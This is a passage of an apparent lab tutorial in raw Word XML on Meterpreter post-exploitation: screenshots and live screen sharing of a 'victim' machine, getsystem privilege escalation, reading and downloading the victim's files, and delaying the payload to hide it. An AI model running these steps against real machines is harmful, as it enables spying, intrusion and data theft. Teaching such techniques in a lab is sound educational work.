          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as spyware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="10DCDACA" w:rsidP="577B6A5F" w:rsidRDefault="10DCDACA" w14:paraId="61069291" w14:textId="64431C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> First, going back to the victim machine, we will type in </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>espia</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>screengrab</w:t>
      </w:r>
      <w:r w:rsidR="10DCDACA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to take a screenshot of the victim’s machine.</w:t>
      </w:r>
      <w:r w:rsidR="257CF80D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then, look through the kali folder and you should be able to see the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74CE579F" w:rsidP="577B6A5F" w:rsidRDefault="74CE579F" w14:paraId="309F4E11" w14:textId="0B01DACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="74CE579F">
        <w:drawing>
          <wp:inline wp14:editId="6D6FCF08" wp14:anchorId="7ACC2A74">
            <wp:extent cx="5257800" cy="2524125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93244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0fc026a19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CE579F">
        <w:rPr/>
        <w:t xml:space="preserve">This is a screenshot of the </w:t>
      </w:r>
      <w:r w:rsidR="74CE579F">
        <w:rPr/>
        <w:t>victims</w:t>
      </w:r>
      <w:r w:rsidR="74CE579F">
        <w:rPr/>
        <w:t xml:space="preserve"> machi</w:t>
      </w:r>
      <w:r w:rsidR="3449A17A">
        <w:rPr/>
        <w:t xml:space="preserve">ne. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34F0484A" w:rsidP="577B6A5F" w:rsidRDefault="34F0484A" w14:paraId="3FE811C3" w14:textId="26E3CF59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="34F0484A">
        <w:rPr/>
        <w:t xml:space="preserve">Next, type in </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="34F0484A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidR="34F0484A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to put the </w:t>
      </w:r>
      <w:r w:rsidR="34F0484A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="34F0484A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in as a background process. We can return to it later.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="5FD150AB">
        <w:drawing>
          <wp:inline wp14:editId="3B0449BD" wp14:anchorId="6BAE7955">
            <wp:extent cx="3600952" cy="1581371"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158193286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73c28db26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D150AB" w:rsidP="577B6A5F" w:rsidRDefault="5FD150AB" w14:paraId="021CA854" w14:textId="0A737557">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5FD150AB">
        <w:rPr/>
        <w:t>Lets</w:t>
      </w:r>
      <w:r w:rsidR="5FD150AB">
        <w:rPr/>
        <w:t xml:space="preserve"> load a screenshare module to continuously see the victim’s screen. </w:t>
      </w:r>
      <w:r w:rsidR="09D203E7">
        <w:rPr/>
        <w:t xml:space="preserve">Run the command </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="09D203E7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>use post/multi/manage/screenshare</w:t>
      </w:r>
      <w:r w:rsidR="09D203E7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then run </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="09D203E7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. We can see the victim’s machine, and how the local port is 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="089B9F88" w:rsidP="577B6A5F" w:rsidRDefault="089B9F88" w14:paraId="511973CD" w14:textId="55D01C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="089B9F88">
        <w:drawing>
          <wp:inline wp14:editId="014ED9AC" wp14:anchorId="7300D9C1">
            <wp:extent cx="4191585" cy="2629267"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="994938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7f8412253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B9F88" w:rsidP="577B6A5F" w:rsidRDefault="089B9F88" w14:paraId="775B3AC5" w14:textId="59CDA3B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="089B9F88">
        <w:rPr/>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enter </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="089B9F88" w:rsidP="577B6A5F" w:rsidRDefault="089B9F88" w14:paraId="0D3F5160" w14:textId="59C98BD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We now have a website that we can visit to see the </w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="089B9F88" w:rsidP="577B6A5F" w:rsidRDefault="089B9F88" w14:paraId="0152E481" w14:textId="26BC2164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the website and interact with the victim machine. We can see that we can see </w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>live</w:t>
      </w:r>
      <w:r w:rsidR="089B9F88">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0659F63F" w:rsidP="577B6A5F" w:rsidRDefault="0659F63F" w14:paraId="7AE4E72E" w14:textId="219AC812">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="0659F63F">
        <w:drawing>
          <wp:inline wp14:editId="339155AD" wp14:anchorId="3693DEB1">
            <wp:extent cx="5257800" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="151665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584052983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9F63F" w:rsidP="577B6A5F" w:rsidRDefault="0659F63F" w14:paraId="640684C8" w14:textId="12BD3141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0659F63F">
        <w:rPr/>
        <w:t xml:space="preserve">There are several options we can use, including </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="0659F63F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>control target</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="0659F63F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="0659F63F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>image delay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68620E29" w:rsidP="577B6A5F" w:rsidRDefault="68620E29" w14:paraId="3EF3B035" w14:textId="7809C861">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="68620E29">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6.2: </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="6FA361F8">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5D5B1F9C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E6DB348" w:rsidP="577B6A5F" w:rsidRDefault="5E6DB348" w14:paraId="63C4AF98" w14:textId="1790A320">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To begin, </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>return back</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E6DB348" w:rsidP="577B6A5F" w:rsidRDefault="5E6DB348" w14:paraId="3256A78C" w14:textId="168ABF2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E6DB348">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>priv</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="65011E0D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note that it may already be loaded.</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="1716BDD0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In our system, the administrator was careful and made sure there were no privileges that we did not need.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1716BDD0" w:rsidP="577B6A5F" w:rsidRDefault="1716BDD0" w14:paraId="061F04EC" w14:textId="683A962C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="1716BDD0">
        <w:drawing>
          <wp:inline wp14:editId="1717E7F2" wp14:anchorId="77847271">
            <wp:extent cx="5257800" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1443726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cdabbf735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339A1" w:rsidP="577B6A5F" w:rsidRDefault="5E0339A1" w14:paraId="4982615B" w14:textId="1EE50030">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5E0339A1">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6.3: </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="0EEB7D2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Fun with Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0EEB7D2A" w:rsidP="577B6A5F" w:rsidRDefault="0EEB7D2A" w14:paraId="472D2123" w14:textId="6EEC725D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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="0EEB7D2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0EEB7D2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Now, we will go ahead and read and download files from the victim.</w:t>
      </w:r>
      <w:r w:rsidR="0EEB7D2A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> On the victim machine, go to </w:t>
      </w:r>
      <w:r w:rsidR="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>the downloads folder and create a text file. Enter some text into it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21DEF985" w:rsidP="577B6A5F" w:rsidRDefault="21DEF985" w14:paraId="3447F800" w14:textId="203A59A1">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="21DEF985">
        <w:drawing>
          <wp:inline wp14:editId="1D807CB6" wp14:anchorId="0A246DC4">
            <wp:extent cx="5943600" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175025080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eb768171c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EF985" w:rsidP="577B6A5F" w:rsidRDefault="21DEF985" w14:paraId="0C510E64" w14:textId="4AFF1232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, on the attacker machine, we will </w:t>
      </w:r>
      <w:r w:rsidR="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>attempt</w:t>
      </w:r>
      <w:r w:rsidR="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to read the file using </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="21DEF985">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>cat test.txt</w:t>
      </w:r>
      <w:r w:rsidR="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="21DEF985" w:rsidP="577B6A5F" w:rsidRDefault="21DEF985" w14:paraId="53EC49E2" w14:textId="32100C8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="21DEF985">
        <w:drawing>
          <wp:inline wp14:editId="301E41C2" wp14:anchorId="71B89973">
            <wp:extent cx="4867954" cy="533474"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132378286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a9e38c702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EF985" w:rsidP="577B6A5F" w:rsidRDefault="21DEF985" w14:paraId="3F671A25" w14:textId="310702C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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="21DEF985">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>We successfully read it. Now, we can even download it.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="696BBA06">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All we need to run is </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="696BBA06">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>download test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="696BBA06" w:rsidP="577B6A5F" w:rsidRDefault="696BBA06" w14:paraId="5F3103BB" w14:textId="664B543A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="696BBA06">
        <w:drawing>
          <wp:inline wp14:editId="6977CAB4" wp14:anchorId="72734090">
            <wp:extent cx="5943600" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153488392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634adf5ec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C3DEB" w:rsidP="577B6A5F" w:rsidRDefault="29AC3DEB" w14:paraId="77B66665" w14:textId="7616136D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="29AC3DEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the most volatile use for </w:t>
      </w:r>
      <w:r w:rsidR="29AC3DEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="29AC3DEB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be used to swiftly gain information about a company, or even be hidden in different applications for months, even years and slowly export </w:t>
      </w:r>
      <w:r w:rsidR="0D92E04F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">most of the network information that is available. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A102436" w:rsidP="577B6A5F" w:rsidRDefault="7A102436" w14:paraId="0F6194B1" w14:textId="4D25CAC7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="7A102436">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 6.4: Hiding </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="7A102436">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2683EB53" w:rsidP="577B6A5F" w:rsidRDefault="2683EB53" w14:paraId="53735378" w14:textId="25B68B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hiding </w:t>
      </w:r>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>very easy</w:t>
      </w:r>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Simply use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>sleep &lt;time in seconds&gt;</w:t>
      </w:r>
      <w:r w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so, for example, </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2683EB53">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>sleep 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E9CEAE0" w:rsidP="577B6A5F" w:rsidRDefault="3E9CEAE0" w14:paraId="02CADC78" w14:textId="687AEC9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3E9CEAE0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, run </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="3E9CEAE0">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="3E9CEAE0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and wait for the sleep to be over.</w:t>
      </w:r>
    </w:p>
